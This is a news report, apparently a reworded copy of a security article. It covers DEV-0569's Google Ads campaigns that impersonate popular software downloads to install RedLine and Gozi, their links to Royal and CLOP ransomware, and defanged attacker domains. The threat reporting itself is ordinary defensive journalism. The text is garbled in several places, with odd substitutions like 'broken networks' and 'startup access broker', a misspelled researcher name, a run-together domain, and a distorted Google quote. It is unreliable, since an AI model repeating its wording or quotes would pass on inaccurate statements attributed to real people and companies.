A threat actor tracked as DEV-0569 uses Google Ads in widespread, ongoing advertising campaigns to distribute malware, steal victims’ passwords, and ultimately breach networks for ransomware attacks.
These ads pretend to be websites for popular software, such as LightShot, Rufus, 7-Zip, FileZilla, LibreOffice, AnyDesk, Awesome Miner, TradingView, WinRAR and VLC.
Clicking on the ads takes visitors to websites that appear as download portals or copies of the software’s legitimate websites, as shown below.
However, when you click on the download links, you usually download an MSI file that installs various malware depending on the campaign.
The list of malware installed in these campaigns so far includes RedLine Stealer, Gozi/Ursnif, Vidar, and possibly, Cobalt Strike and ransomware.
While it appears that many threat actors are abusing the Google Ads platform to distribute malware, two particular campaigns stand out because their infrastructure has previously been associated with ransomware attacks.
From Google ads to ransomware attacks
In February 2022, Mandiant discovered a malware distribution campaign using SEO poisoning to rank websites impersonating popular apps in search results.
If a user were to install the software offered by these pages, it would execute a new malware downloader called BatLoader, which launches a multi-step infection process that ultimately provides the threat actors with initial access to the victims’ networks.
Later that year, Microsoft reported that the threat actors behind BatLoader, tracked as DEV-0569, began using Google ads to promote their malicious websites. Even worse, Microsoft said that these infections ultimately led to the deployment of Royal Ransomware on broken networks.
“Recent activity by the threat actor that Microsoft is tracking as DEV-0569, known to distribute various payloads, led to the deployment of the Royal ransomware, which first appeared in September 2022 and is distributed by multiple threat actors,” warned Microsoft in their report.
Researchers believe that DEV-0569 is a startup access broker that uses its malware distribution system to breach corporate networks. They use this approach in their own attacks or sell it to other malicious actors, such as the Royal ransomware gang.
bitbucket(.)org/ganhack123/load/downloads ads-check(.)com (Used for tracking Google ads statistics)
Fast forward to January 21, 2023, when a CronUp researcher German Fernandez noted that recent Google ads promoting popular software led to malicious websites utilizing infrastructure operated by the DEV-0569 threat actors.
1/ DEV-0569, current distribution by #GoogleAds.
(No more BatLoader in the infection chain) pic.twitter.com/mYp8hSU7FH
— Germana Fernandez (@1ZRR4H) January 21, 2023
While malicious installers in this campaign no longer use BatLoader, like the previous campaigns seen by Microsoft, they install an information stealer (RedLine Stealer) and then a malware downloader (Gozi/Ursnif).
In the current campaign, RedLine is used to steal data, such as passwords, cookies and crypto wallets, while Gozi/Ursnif is used to download additional malware.
Fernández told BleepingComputer that he linked these new campaigns to DEV-0569 because they used the same bitbucket repository and the ads-check(.)com URL used in the reported November/December 2022 campaigns.
Fernández didn’t wait long enough to see if Cobalt Strike and Royal Ransomware would be installed. However, he told BleepingComputer that he believed the hackers would eventually use the Gozi infection to bring down Cobalt Strike like BatLoader did in previous campaigns.
Fernández also accessed the web panel of DEV-0569 used to track their malware distribution campaign and split screen shots on Twitter. These screenshots showed the legitimate programs being spoofed and the many victims worldwide who were infected every day.
Asked how many people were infected by this campaign based on the website’s statistics, he said it was only possible to estimate the number.
“They clean the panel data every campaign day, but there is data that could give us an idea, it is the correlative identifier of the records (it could be an estimated value for the number of victims from this panel, in this case the last today’s value is 63576),” Fernández told BleepingComputer.
Another campaign related to CLOP ransomware
To make matters worse, Fernandez discovered that a different but similar Google ads campaign used infrastructure previously used by a threat group tracked as TA505, is known to distribute the CLOP ransomware.
In this Google ad campaign, the threat actors distribute malware through websites pretending to be popular software, such as AnyDesk, Slack, Microsoft Teams, TeamViewer, LibreOffice, Adobe, and, oddly enough, websites for W-9 IRS forms.
A list of domains in this campaign tracked by CronUp is available on this GitHub page.
When this campaign’s malware is installed, it will run a PowerShell script that downloads and executes a DLL from the website. download-cdn(.)comwho TA505 previously used.
However, Proofpoint threat researcher Tommy Madjar told BleepingComputer that this domain has changed ownership in the past, and it’s unclear if TA505 is still using it.
Regardless of who owns these domains, the large number of malicious Google ads displayed in search results is becoming a huge problem for both consumers and the business.
With these campaigns used to gain initial access to corporate networks, they can cause various attacks, such as data theft, ransomware, and even destructive attacks to disrupt a company’s operations.
While BleepingComputer has not contacted Google regarding this article, we did contact them last week regarding a similar malware campaign distributed through Google ads.
Google told us at the time that the platform’s policies are designed and enforced to prevent brand imitation.
“We have robust policies banning ads that try avoid our compulsion masking the identity of the advertiser and impersonating other brands, and we vigorously enforce them. We reviewed the ads in question and removed them,’ Google told BleepingComputer.
The good news is that Google has removed ads like they are reported and detected.
The bad news is that the threat actors are constantly launching new ad campaigns and new websites, making it a giant game of whack-a-mole, and it doesn’t feel like Google is winning.